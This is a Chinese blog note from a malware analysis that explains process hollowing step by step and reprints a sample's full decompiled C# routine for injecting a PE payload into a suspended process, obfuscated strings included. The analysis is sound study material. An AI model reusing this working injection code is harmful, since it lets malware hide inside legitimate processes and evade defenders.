IIlIlllIIllIll
IIlIlllIIllIll

傀儡进程

前边分析样本,碰到个创建傀儡进程的dll,看了半天代码,才看懂是创建傀儡进程
写个笔记,总结一下
参考:https://www.4hou.com/technology/8869.html

实现思路:

1.通过CreateProcess创建进程,传入参数CREATE_SUSPENDED使进程挂起
2.通过NtUnmapViewOfSection清空新进程的内存数据
3.通过VirtualAllocEx申请新的内存
4.通过WriteProcessMemory向内存写入payload
5.通过SetThreadContext设置入口点
6.通过ResumeThread唤醒进程,执行payload

1、傀儡进程的选择

如果傀儡进程已经运行,那么将无法实现替换(指针不可控、无法获得主线程句柄等)
所以这种利用方法只能通过创建新进程,传入参数CREATE_SUSPENDED使进程挂起,在进程执行前对其替换

2、清空新进程的内存数据

进程初始化后,内存会加载映像文件,为了清空新进程的内存数据,可以使用函数NtUnmapViewOfSection卸载映像

NTSTATUS NtUnmapViewOfSection(
  _In_     HANDLE ProcessHandle,    //进程句柄
  _In_opt_ PVOID  BaseAddress       //映像基址 ,base virtual address
);
3、申请新的内存

使用VirtualAllocEx函数时,可以将傀儡进程的ImageBaseAddress作为申请空间的首地址,这样可以避免考虑“重定位”的问题

4、写入payload

写入时,需要先比较payload和傀儡进程的ImageBaseAddress之间的偏移,如果存在偏移,需要进行重定位(使用.reloc区段)

5、恢复环境

替换前后需要保证寄存器正常,所以仅需要修改进程的入口点(即EAX寄存器)
在最开始通过GetThreadContext获得所有寄存器的信息(保存在结构体_CONTEXT中)
然后使用SetThreadContext恢复寄存器信息,再通过ResumeThread唤醒进程,即可执行payload

样本中的创建傀儡进程

private static bool smethod_0(string string_0, byte[] byte_0, bool bool_0)
		{
			int num = 0;
			string string_ = "\"{path}\"";
			VOVO.Struct6 @struct = default(VOVO.Struct6);
			VOVO.Struct5 struct2 = default(VOVO.Struct5);
			@struct.uint_0 = Convert.ToUInt32(Marshal.SizeOf(typeof(VOVO.Struct6)));
			bool result;
			try
			{
				if (!VOVO.CreateProcess(string_0, string_, IntPtr.Zero, IntPtr.Zero, false, 4u, IntPtr.Zero, null, ref @struct, ref struct2))
				{
					throw new Exception();
				}
				MethodInfo method = typeof(BitConverter).GetMethod("ToInt32");
				object[] parameters = new object[]
				{
					byte_0,
					60
				};
				int num2 = Convert.ToInt32(method.Invoke(null, parameters));
				object[] parameters2 = new object[]
				{
					byte_0,
					num2 + 26 + 26
				};
				int num3 = Convert.ToInt32(method.Invoke(null, parameters2));
				int[] array = new int[179];
				array[0] = 65538;
				if (IntPtr.Size == 4)
				{
					if (!VOVO.GetThreadContext(struct2.intptr_1, array))
					{
						throw new Exception();
					}
				}
				else if (!VOVO.Wow64GetThreadContext(struct2.intptr_1, array))
				{
					throw new Exception();
				}
				int num4 = array[41];
				int num5 = 0;
				if (!VOVO.ReadProcessMemory(struct2.intptr_0, num4 + 4 + 4, ref num5, 4, ref num))
				{
					throw new Exception();
				}
				if (num3 == num5 && VOVO.NtUnmapViewOfSection(struct2.intptr_0, num5) != 0)
				{
					throw new Exception();
				}
				object[] parameters3 = new object[]
				{
					byte_0,
					num2 + 80
				};
				int int_ = Convert.ToInt32(method.Invoke(null, parameters3));
				object[] parameters4 = new object[]
				{
					byte_0,
					num2 + 42 + 42
				};
				int int_2 = Convert.ToInt32(method.Invoke(null, parameters4));
				bool flag = false;
				int num6 = VOVO.VirtualAllocEx(struct2.intptr_0, num3, int_, 12288, 64);
				if (num6 == 0)
				{
					throw new Exception();
				}
				if (!VOVO.WriteProcessMemory(struct2.intptr_0, num6, byte_0, int_2, ref num))
				{
					throw new Exception();
				}
				int num7 = num2 + 248;
				short num8 = BitConverter.ToInt16(byte_0, num2 + 3 + 3);
				for (int i = 0; i < (int)num8; i++)
				{
					object[] parameters5 = new object[]
					{
						byte_0,
						num7 + 6 + 6
					};
					int num9 = Convert.ToInt32(method.Invoke(null, parameters5));
					object[] parameters6 = new object[]
					{
						byte_0,
						num7 + 8 + 8
					};
					int num10 = Convert.ToInt32(method.Invoke(null, parameters6));
					object[] parameters7 = new object[]
					{
						byte_0,
						num7 + 20
					};
					int num11 = Convert.ToInt32(method.Invoke(null, parameters7));
					if (num10 != 0)
					{
						byte[] array2 = new byte[num10];
						MethodInfo method2 = typeof(Buffer).GetMethod("Bl#####ckC#####py".Replace("#####", "o"));
						object[] parameters8 = new object[]
						{
							byte_0,
							num11,
							array2,
							0,
							array2.Length
						};
						method2.Invoke(null, parameters8);
						if (!VOVO.WriteProcessMemory(struct2.intptr_0, num6 + num9, array2, array2.Length, ref num))
						{
							throw new Exception();
						}
					}
					num7 += 40;
				}
				byte[] bytes = BitConverter.GetBytes(num6);
				if (!VOVO.WriteProcessMemory(struct2.intptr_0, num4 + 8, bytes, 4, ref num))
				{
					throw new Exception();
				}
				object[] parameters9 = new object[]
				{
					byte_0,
					num2 + 40
				};
				int num12 = Convert.ToInt32(method.Invoke(null, parameters9));
				if (flag)
				{
					num6 = num3;
				}
				array[44] = num6 + num12;
				if (IntPtr.Size == 4)
				{
					if (!VOVO.SetThreadContext(struct2.intptr_1, array))
					{
						throw new Exception();
					}
				}
				else if (!VOVO.Wow64SetThreadContext(struct2.intptr_1, array))
				{
					throw new Exception();
				}
				if (VOVO.ResumeThread(struct2.intptr_1) == -1)
				{
					throw new Exception();
				}
			}
			catch
			{
				Process processById = Process.GetProcessById(Convert.ToInt32(struct2.uint_0));
				processById.Kill();
				result = false;
				return result;
			}
			result = true;
			return result;
		}

你可能感兴趣的:(傀儡进程)

  • C# 重启exploer.exe zw05011
    重启exploer.exe,以加载新的注册表信息先杀掉,再启动。重启exploer.exe,以加载新的注册表信息先杀掉,再启动。usingSystem.Diagnostics;process[]processes=process.getprocesses();//获取所有进程信息for(inti=0;i
  • 小识Java死锁是否会造成CPU100%? 天天向上杰 java开发语言
    死锁或者大量的死锁不一定会直接导致CPU占用率达到100%。以下是详细分析:一、死锁对CPU的影响资源占用:死锁是指两个或多个线程(或进程)在相互等待对方释放资源,导致所有涉及的线程都无法继续执行。在死锁状态下,这些线程实际上并没有进行有效的计算或处理,而是处于等待状态。CPU使用情况:虽然死锁线程本身并不消耗大量的CPU资源,但它们会阻塞系统的其他部分,导致整体性能下降。如果系统中存在大量的死锁
  • nginx常用配置及调优 大白菜和MySQL linuxnginxnginx服务器网络
    文章目录nginx编译安装php编译安装整合nginx连接php测试LNMP环境的PHP服务是否可以连接mysqlnginx配置ssl证书及http跳转https编译安装nginx后新添加模块隐藏nginx版本号和标识配置nginx运行用户和cpu亲和性优化nginx事件处理模型优化nginx最多可打开文件数优化nginx进程最大并发连接数虚拟主机(servername)和location匹配规则
  • linux常用命令及其用法整理 银月流霜 Linuxlinux运维服务器
    文章目录帮助和信息文件与目录查看文件及内容处理文件与目录权限管理查看系统信息搜索文件网络操作命令磁盘与文件系统用户管理用户信息文件压缩及解压缩Linux内置命令系统管理与性能监视命令关机/重启/注销和查看系统信息的命令任务/进程管理帮助和信息man查看命令手册用法:man[命令名]示例:manls(查看ls命令的手册)info显示命令信息(通常比man更详细)用法:info[命令名]示例:info
  • Python--进程和线程 Ssaty. python开发语言
    第1关:Python多进程-求素数个数本关任务:使用Python多进程求素数个数。importmathfrommultiprocessingimportcpu_countfrommultiprocessingimportPool#判断数字是否为质数#**********Begin*****
  • golang网络编程 编程小猹 go学习go网络编程
    socket编程socket图解Socket是BSDUNIX的进程通信机制,通常也称作”套接字”,用于描述IP地址和端口,是一个通信链的句柄。Socket可以理解为TCP/IP网络的API,它定义了许多函数或例程,程序员可以用它们来开发TCP/IP网络上的应用程序。电脑上运行的应用程序通常通过”套接字”向网络发出请求或者应答网络请求。Socket又称“套接字”,应用程序通常通过“套接字”向网络发出
  • PostgreSQL体系结构 eygle
    原文:https://www.enmotech.com/web/detail/1/764/1.html导读:本文主要从日志文件、参数文件、控制文件、数据文件、redo日志(WAL)、后台进程这六个方面来讨论PostgreSQL的结构。一、引言PostgreSQL是最像Oracle的开源数据库,我们可以拿MySQL和Oracle来比较学习它的体系结构,比较容易理解。本文会讨论pg的如下结构:日志文件
  • 神经网络|(三)线性回归基础知识 西猫雷婶 神经网络线性回归机器学习
    【1】引言前序学习进程中,已经对简单神经元的工作模式有所了解,这种二元分类的工作机制,进一步使用sigmoid()函数进行了平滑表达。相关学习链接为:神经网络|(一)加权平均法,感知机和神经元-CSDN博客神经网络|(二)sigmoid神经元函数-CSDN博客实际上,上述表达模型的一个基本原则是:元素和对应的权重,线性相乘后再和阈值开关作对比,元素的综合影响在本质上是一个线性函数,类似于y=wx+
  • 如何在 Linux 下查看进程是以哪个用户身份在运行的? surfirst Linuxlinux
    不同的用户有不同的权限。通过查看进程是以哪个用户身份在运行的,可以为开发者调试程序时提供查明故障原因的线索。以下命令可以帮助我们找出进程的用户身份:psaux|grepxxxxx以上命令的xxxxx是进程ID,以数字表示。运行以上命令以后,会得到类似下面的结果:上面的命令查询了进程26962的用户,结果是azureuser。
  • Docker操作指南 梦想的边缘 运维docker容器运维
    Docker操作指南概念解释:镜像(Image):Docker将应用程序及其所需的依赖、函数库、环境、配置等文件打包在一起供运行启动,称为镜像。容器(Container):镜像中的应用程序运行后形成的进程就是容器,容器之间是隔离,容器对外也是不可见的镜像托管平台(DockerHub):DockerHub是一个Docker镜像的托管平台。这样的平台称为DockerRegistry。国内的网易云镜像服
  • 浅谈 redis BigDeng_2014 工作redis数据库java
    redis特点:单进程多线程。主线程只有一个,还有两个副线程,用于文件和IO处理。可以集群部署,数据在各个机器上都有备份,挂了一台机器,可以从其他机器上找到数据。集群带来主从节点机制,一般至少需要3个节点来选举出主节点,也可以指定主节点。主从同步问题,会导致数据不一致。保证了分布式P和可用性A,牺牲了一致性C,可以保证最终一致性。比如数据恢复。把数据存放到内存,从内存查找数据比较快一些。有key-
  • Django报错:Error: [WinError 10013] 以一种访问权限不允许的方式做了一个访问套接字的尝试。 工具人丶Amber Django报错
    问题描述:启动django服务时出现“Error:[WinError10013]以一种访问权限不允许的方式做了一个访问套接字的尝试。”的错误问题解决1:默认启动的服务端口是8000,启动时修改该端口即可问题解决2:也可以查询端口占用的进程,杀死占用的进程(慎用)netstat-ano打开任务管理器,找到记录PID的运行程序,结束程序即可,慎用!!!!
  • HarmonyOS应用级别的状态管理 秃顶老男孩. harmonyos华为ui
    应用状态管理概念AppStorage:应用全局UI存储(范围是整个应用),是和应用进程绑定,由UI框架在应用程序启动时创建。为应用程序UI状态提供中央存储AppStorage是应用级的全局共享,相当于整个应用的‘中枢’,持久化数据PersistentStorage是通过AppStorage进行中转,才能与UI进行交互方法//AppStorage//AppStorage.ref('name')查找某
  • 医疗机构关于DIP/DRG信息化建设 DIPDRG分组器团队 数据库
    推进DIP/DRG支付方式改革是一项系统性工程,牵一发而动全身。作为河北省DIP试点医院,河北医科大学第二医院将信息化与创新性管理理念融合,用好支付工具做好精细化管理,积极应对改革。■改革背景国家医疗保障局制定的《DRG/DIP支付方式改革三年行动计划》指出,为加快建立管用高效的医保支付机制,将分期分批加快推进改革进程:从2022到2024年,全面完成DRG/DIP付费方式改革任务,推动医保高质量
  • 基于数智立体化V2.0体系构建医疗综合智能体:理论、实践与展望 Allen_LVyingbo 医疗高效编程研发python健康医疗知识图谱python
    一、引言1.1研究背景与意义医疗行业作为关乎人类生命健康与社会福祉的重要领域,始终处于不断发展与变革的进程之中。在当下,随着全球人口老龄化趋势的加剧,慢性疾病的发病率持续攀升,人们对医疗服务的需求呈现出快速增长且日益多样化的态势。与此同时,传统医疗模式在应对这些挑战时,逐渐暴露出诸多问题,如医疗资源分布不均衡,偏远地区和基层医疗机构面临着医疗技术匮乏、设备陈旧等困境;医疗服务效率低下,患者就医等待
  • python学opencv|读取图像(四十四)原理探究:bitwise_and()函数实现图像按位与运算 西猫雷婶 人工智能opencv人工智能计算机视觉
    【1】引言前序学习进程中,已经掌握了两张图片按位与操作的基本技巧:python学opencv|读取图像(四十三)使用cv2.bitwise_and()函数实现图像按位与运算-CSDN博客【2】cv2.bitwise_and()函数实现图像按位与运算原理【2.1】图像运算在前述学习过程中,我们只是使用了cv2.bitwise_and()函数,其实未曾深入探究其根本原理。为实现原理探索,直接使用彩色图
  • 分布式通信框架--RMI 王婷婷-Smily 分布式分布式
    文章目录分布式对象模型远程对象本地对象模型RMI基本原理如何实现分布式对象模型远程对象不仅是可以被本地进程访问,也可以远程进程调用;本地对象仅仅可以是本地进程使用模型下图中,A、B各代表一台服务器,当他们各自自己调用的时候,即为本地对象,当A中的对象调用B中的,则为远程对象,这时候如果要保证A、B中的对象之间能够可靠的进行消息通信,采用的是TCP协议作为通信协议RMI基本原理 分布式对象模型有很多
  • 【skynet源码阅读系列】03_skynet_context_new 程序员杨小哥 skynet
    上一节看了skynet_start()的一部分代码,那部分代码主要做了下面几件事。如果当前进程收到SIGHUP信号,则调用handle_hup函数,将SIG设为1检查配置文件内的deamon配置,这个配置对应一个文件路径,文件内的记录进程的pid号,防止重复启动skynet进程,第一次启动将自动将进程号写入文件。重定向了文件描述符,把文件描述符0,1,2重定向到了/dev/null,相当于当前进程
  • Tomcat 启动报错 : There is insufficient memory for the Java Runtime Environment to continue m0_74825614 javatomcat开发语言
    Tomcat启动报错“ThereisinsufficientmemoryfortheJavaRuntimeEnvironmenttocontinue”通常表示JVM(Java虚拟机)在尝试分配内存时遇到了问题。这通常是由于以下原因之一:系统内存不足:你的物理内存不足以满足JVM的内存需求。JVM参数设置不当:你为JVM设置的内存参数可能过高,超过了系统的可用内存。其他进程占用了大量内存:系统中运行
  • C# 关于进程回收管理的一款工具设计与分享 初九之潜龙勿用 c#开发语言
    目录设计初衷开发运行环境CraneofficeProcessGC运行主界面管理任务与策略其它设置移动存储设备管理核心代码-计时器监控小结设计初衷在使用COM模式操作OFFICE组件的开发过程中,当操作完相关文档后,在某些情况下仍然无法释放掉Word或EXCEL等应用进程,因此根据进程活动情况或时间点范围开发了一个强制杀掉指定进程名称的WinForm程序,做为一种辅助工具运行在云服务器上,命名为Cr
  • ✨探究✨进程最大可以打开多少个文件 linuxlinux运维运维
    大家好,我是半夏之沫一名金融科技领域的JAVA系统研发我希望将自己工作和学习中的经验以最朴实,最严谨的方式分享给大家,共同进步写作不易,期待大家的关注和点赞关注微信公众号【技术探界】前言原本是想搞清楚一台服务器最多能建立多少个连接,在学习的过程中,发现能建立多少个连接受多个因素影响,其中一个因素就是进程最大可打开文件数,我在自行查阅资料加请教专门搞容器的同事后,感觉这个知识点有点意思,故撰写此文以
  • Golang-Context标准库源码深扒-简介&目录 动起点 golang源码深扒#开发语言golang后端
    Context简介&目录简介以下来自官方文档的翻译:context包定义了Context类型,用于跨越API边界和进程传递截止时间、取消信号以及其他与请求相关的值。服务器接收到的请求应该创建一个Context,而发往服务器的调用应该接受一个Context。在它们之间的函数调用链必须传播Context,并可以选择用WithCancel、WithDeadline、WithTimeout或WithVal
  • 奇墨FinOps云成本优化:创新架构攻克云成本优化难题 奇墨 ITQM 云计算
    企业的数字化转型已成为大势所趋,云服务作为推动企业数字化进程的关键力量,为企业带来了前所未有的便捷性与灵活性。同时,云成本的复杂性以及持续增长的趋势,不仅考验着企业的财务管理能力,更关乎企业的核心竞争力与可持续发展。奇墨FinOps创新框架为破局企业云成本优化挑战带来了崭新的希望。成本态势感知引擎赋能财务决策奇墨FinOps创新框架是专属于财务算法模型及策略库,智能评价与规划资源投入ROI,解决云
  • 服务器遭到入侵后的排查与应对 Ryann6 服务器运维
    目录1.立即隔离受影响的服务器2.检查系统日志重点检查:3.检查运行中的进程和开放端口4.检查文件系统的异常更改5.分析网络流量6.检查用户账户和权限7.查杀恶意软件8.恢复系统和加强防御最后在当今的网络环境中,服务器遭到入侵已经成为一个不可忽视的安全威胁。无论是个人网站、企业服务,还是云平台上的资源,一旦服务器被攻击,可能会导致数据泄露、服务中断、甚至财务损失。本文将介绍如何在服务器遭到入侵后进
  • Linux pstree 命令详解 linuxlinux运维
    简介pstree命令用于以分层(树状)格式显示正在运行的进程。它显示进程之间的关系,例如哪些进程是由其他进程生成的。安装#基于Debian/Ubuntu的系统sudoaptinstallpsmisc#基于CentOS/RHEL/Fedora的系统sudoyuminstallpsmisc#使用dnf安装sudodnfinstallpsmisc基本语法pstree[options][pid|user]
  • 使用uWSGI将Flask应用部署到生产环境 liuhongyue flaskpython后端
    使用uWSGI将Flask应用部署到生产环境:1、安装uWSGIcondainstall-cconda-forgeuwsgi(pipinstalluwsgi会报错)2、配置uWSGI在python程序的同一文件夹下创建uwsgi.ini文件,文件内容如下表。需要按照实际情况修改文件名称地址,log文件保存路径,启动的进程数和线程数等3、启动服务,执行命令:uwsgi--iniuwsgi.ini4、
  • SoftAP 模式 wifi调试方法与技巧 好多渔鱼好多 wifi驱动移植与调试网络
    目录简介检查WiFi设备、加载驱动步骤1:检查设备步骤2:加载驱动使用iwpriv配置和启动SoftAP步骤1开启SoftAP步骤2配置信道步骤3配置认证与加密方式步骤4设置SSID使用hostapd配置和启动SoftAP步骤1修改hostapd.conf文件编辑步骤2启动hostapd进程编辑开启udhcpd配置静态IP简介前面介绍的wifi调试技巧是基于sta模式下的操作。SoftAP(软件接
  • android服务的启动过程,Android Service启动流程 weixin_39968640 android服务的启动过程
    一、Service生命周期首先我们先回忆一下Service的声明周期image第一次调用startServie():Service.onCreate()->Service.onStartCommand()第二次调用startService():Service.onStartCommand()本周主要分析上面两步操作,Service的启动行为。二、Service启动分析image阶段一:app进程s
  • Kubernetes网络 qichengzong_right linuxkubernetes云原生linux云原生kubernetes
    Kubernetes网络Kubernetes网络模型相关概念链接Kubernetes网络模型Kubernetes网络模型由多个关键部分构建而成:在Kubernetes集群中,每个Pod都会被分配一个独一无二的、在集群范围内有效的IP地址。Pod拥有自己独立的私有网络命名空间,该命名空间由Pod内的所有容器共享。这意味着,在同一Pod中运行的不同容器进程能够通过localhost进行便捷的相互通信。
  • 15 分布式锁和分布式session 40岁的系统架构师 分布式系统架构
    在java中一个进程里面使用synchronized在new出来对象头信息中加锁,如果是静态方法中在加载的类信息中加锁(我们在锁的原理中讲过)。如果使用lock加锁可以自己指定。这些都是在同一个进程空间中的操作。如果在分布式环境中由于程序不在一个进程空间,就没办法使用这些原子性的元素中加锁,我们需要在不同的进程空间中找原子性的元素。这就是分布式锁基于数据库的分布式锁该方式通过数据库的唯一索引来实现
  • springmvc 下 freemarker页面枚举的遍历输出 杨白白 enumfreemarker
    spring mvc freemarker 中遍历枚举 1枚举类型有一个本地方法叫values(),这个方法可以直接返回枚举数组。所以可以利用这个遍历。 enum public enum BooleanEnum { TRUE(Boolean.TRUE, "是"), FALSE(Boolean.FALSE, "否");
  • 实习简要总结 byalias 工作
    来白虹不知不觉中已经一个多月了,因为项目还在需求分析及项目架构阶段,自己在这段 时间都是在学习相关技术知识,现在对这段时间的工作及学习情况做一个总结: (1)工作技能方面 大体分为两个阶段,Java Web 基础阶段和Java EE阶段 1)Java Web阶段 在这个阶段,自己主要着重学习了 JSP, Servlet, JDBC, MySQL,这些知识的核心点都过 了一遍,也
  • Quartz——DateIntervalTrigger触发器 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208559 一.概述 simpleTrigger 内部实现机制是通过计算间隔时间来计算下次的执行时间,这就导致他有不适合调度的定时任务。例如我们想每天的 1:00AM 执行任务,如果使用 SimpleTrigger,间隔时间就是一天。注意这里就会有一个问题,即当有 misfired 的任务并且恢复执行时,该执行时间
  • Unix快捷键 18289753290 unixUnix;快捷键;
    复制,删除,粘贴: dd:删除光标所在的行                             &nbs
  • 获取Android设备屏幕的相关参数 酷的飞上天空 android
    包含屏幕的分辨率  以及 屏幕宽度的最大dp 高度最大dp   TextView text = (TextView)findViewById(R.id.text); DisplayMetrics dm = new DisplayMetrics(); text.append("getResources().ge
  • 要做物联网?先保护好你的数据 蓝儿唯美 数据
    根据Beecham Research的说法,那些在行业中希望利用物联网的关键领域需要提供更好的安全性。 在Beecham的物联网安全威胁图谱上,展示了那些可能产生内外部攻击并且需要通过快速发展的物联网行业加以解决的关键领域。 Beecham Research的技术主管Jon Howes说:“之所以我们目前还没有看到与物联网相关的严重安全事件,是因为目前还没有在大型客户和企业应用中进行部署,也就
  • Java取模(求余)运算 随便小屋 java
            整数之间的取模求余运算很好求,但几乎没有遇到过对负数进行取模求余,直接看下面代码: /** * * @author Logic * */ public class Test { public static void main(String[] args) { // TODO A
  • SQL注入介绍 aijuans sql注入
    二、SQL注入范例 这里我们根据用户登录页面 <form action="" > 用户名:<input type="text" name="username"><br/> 密 码:<input type="password" name="passwor
  • 优雅代码风格 aoyouzi 代码
    总结了几点关于优雅代码风格的描述: 代码简单:不隐藏设计者的意图,抽象干净利落,控制语句直截了当。 接口清晰:类型接口表现力直白,字面表达含义,API 相互呼应以增强可测试性。 依赖项少:依赖关系越少越好,依赖少证明内聚程度高,低耦合利于自动测试,便于重构。 没有重复:重复代码意味着某些概念或想法没有在代码中良好的体现,及时重构消除重复。 战术分层:代码分层清晰,隔离明确,
  • 布尔数组 百合不是茶 java布尔数组
      androi中提到了布尔数组;   布尔数组默认的是false,  并且只会打印false或者是true   布尔数组的例子;  根据字符数组创建布尔数组 char[] c = {'p','u','b','l','i','c'}; //根据字符数组的长度创建布尔数组的个数 boolean[] b = new bool
  • web.xml之welcome-file-list、error-page bijian1013 javaweb.xmlservleterror-page
    welcome-file-list 1.定义: <welcome-file-list> <welcome-file>login.jsp</welcome> </welcome-file-list>  2.作用:用来指定WEB应用首页名称。   error-page1.定义: <error-page&g
  • richfaces 4 fileUpload组件删除上传的文件 sunjing clearRichfaces 4fileupload
     页面代码               <h:form id="fileForm">            <rich:
  • 技术文章备忘 bit1129 技术文章
    Zookeeper http://wenku.baidu.com/view/bab171ffaef8941ea76e05b8.html http://wenku.baidu.com/link?url=8thAIwFTnPh2KL2b0p1V7XSgmF9ZEFgw4V_MkIpA9j8BX2rDQMPgK5l3wcs9oBTxeekOnm5P3BK8c6K2DWynq9nfUCkRlTt9uV
  • org.hibernate.hql.ast.QuerySyntaxException: unexpected token: on near line 1解决方案 白糖_ Hibernate
    文章摘自:http://blog.csdn.net/yangwawa19870921/article/details/7553181   在编写HQL时,可能会出现这种代码: select a.name,b.age from TableA a left join TableB b on a.id=b.id  如果这是HQL,那么这段代码就是错误的,因为HQL不支持
  • sqlserver按照字段内容进行排序 bozch 按照内容排序
    在做项目的时候,遇到了这样的一个需求:           从数据库中取出的数据集,首先要将某个数据或者多个数据按照地段内容放到前面显示,例如:从学生表中取出姓李的放到数据集的前面;          select * fro
  • 编程珠玑-第一章-位图排序 bylijinnan java编程珠玑
    import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.Writer; import java.util.Random; public class BitMapSearch {
  • Java关于==和equals chenbowen00 java
    关于==和equals概念其实很简单,一个是比较内存地址是否相同,一个比较的是值内容是否相同。虽然理解上不难,但是有时存在一些理解误区,如下情况: 1、 String a = "aaa"; a=="aaa"; ==> true 2、 new String("aaa")==new String("aaa
  • [IT与资本]软件行业需对外界投资热情保持警惕 comsci it
          我还是那个看法,软件行业需要增强内生动力,尽量依靠自有资金和营业收入来进行经营,避免在资本市场上经受各种不同类型的风险,为企业自主研发核心技术和产品提供稳定,温和的外部环境...       如果我们在自己尚未掌握核心技术之前,企图依靠上市来筹集资金,然后使劲往某个领域砸钱,然
  • oracle 数据块结构 daizj oracle数据块块结构行目录
    oracle 数据块是数据库存储的最小单位,一般为操作系统块的N倍。其结构为: 块头--〉空行--〉数据,其实际为纵行结构。 块的标准大小由初始化参数DB_BLOCK_SIZE指定。具有标准大小的块称为标准块(Standard Block)。块的大小和标准块的大小不同的块叫非标准块(Nonstandard Block)。同一数据库中,Oracle9i及以上版本支持同一数据库中同时使用标
  • github上一些觉得对自己工作有用的项目收集 dengkane github
    github上一些觉得对自己工作有用的项目收集 技能类 markdown语法中文说明 回到顶部 全文检索 elasticsearch bigdesk elasticsearch管理插件 回到顶部 nosql mapdb 支持亿级别map, list, 支持事务. 可考虑做为缓存使用 C
  • 初二上学期难记单词二 dcj3sjt126com englishword
    dangerous 危险的 panda 熊猫 lion 狮子 elephant 象 monkey 猴子 tiger 老虎 deer 鹿 snake 蛇 rabbit 兔子 duck 鸭 horse 马 forest 森林 fall 跌倒;落下 climb 爬;攀登 finish 完成;结束 cinema 电影院;电影 seafood 海鲜;海产食品 bank 银行
  • 8、mysql外键(FOREIGN KEY)的简单使用 dcj3sjt126com mysql
    一、基本概念 1、MySQL中“键”和“索引”的定义相同,所以外键和主键一样也是索引的一种。不同的是MySQL会自动为所有表的主键进行索引,但是外键字段必须由用户进行明确的索引。用于外键关系的字段必须在所有的参照表中进行明确地索引,InnoDB不能自动地创建索引。 2、外键可以是一对一的,一个表的记录只能与另一个表的一条记录连接,或者是一对多的,一个表的记录与另一个表的多条记录连接。 3、如
  • java循环标签 Foreach shuizhaosi888 标签java循环foreach
    1. 简单的for循环 public static void main(String[] args) { for (int i = 1, y = i + 10; i < 5 && y < 12; i++, y = i * 2) { System.err.println("i=" + i + " y="
  • Spring Security(05)——异常信息本地化 234390216 exceptionSpring Security异常信息本地化
    异常信息本地化          Spring Security支持将展现给终端用户看的异常信息本地化,这些信息包括认证失败、访问被拒绝等。而对于展现给开发者看的异常信息和日志信息(如配置错误)则是不能够进行本地化的,它们是以英文硬编码在Spring Security的代码中的。在Spring-Security-core-x
  • DUBBO架构服务端告警Failed to send message Response javamingtingzhao 架构DUBBO
     废话不多说,警告日志如下,不知道有哪位遇到过,此异常在服务端抛出(服务器启动第一次运行会有这个警告),后续运行没问题,找了好久真心不知道哪里错了。    WARN 2015-07-18 22:31:15,272 com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(84)
  • JS中Date对象中几个用法 leeqq JavaScriptDate最后一天
    近来工作中遇到这样的两个需求 1. 给个Date对象,找出该时间所在月的第一天和最后一天 2. 给个Date对象,找出该时间所在周的第一天和最后一天   需求1中的找月第一天很简单,我记得api中有setDate方法可以使用 使用setDate方法前,先看看getDate var date = new Date(); console.log(date); // Sat J
  • MFC中使用ado技术操作数据库 你不认识的休道人 sqlmfc
    1.在stdafx.h中导入ado动态链接库 #import"C:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","end")2.在CTestApp文件的InitInstance()函数中domodal之前写::CoIniti
  • Android Studio加速 rensanning android studio
    Android Studio慢、吃内存!启动时后会立即通过Gradle来sync & build工程。 (1)设置Android Studio a) 禁用插件 File -> Settings...  Plugins 去掉一些没有用的插件。 比如:Git Integration、GitHub、Google Cloud Testing、Google Cloud
  • 各数据库的批量Update操作 tomcat_oracle javaoraclesqlmysqlsqlite
    MyBatis的update元素的用法与insert元素基本相同,因此本篇不打算重复了。本篇仅记录批量update操作的 sql语句,懂得SQL语句,那么MyBatis部分的操作就简单了。   注意:下列批量更新语句都是作为一个事务整体执行,要不全部成功,要不全部回滚。 MSSQL的SQL语句  WITH R AS(   SELECT 'John' as name, 18 as
  • html禁止清除input文本输入缓存 xp9802 input
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off"; eg: <input type="text" autocomplete="off" name
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他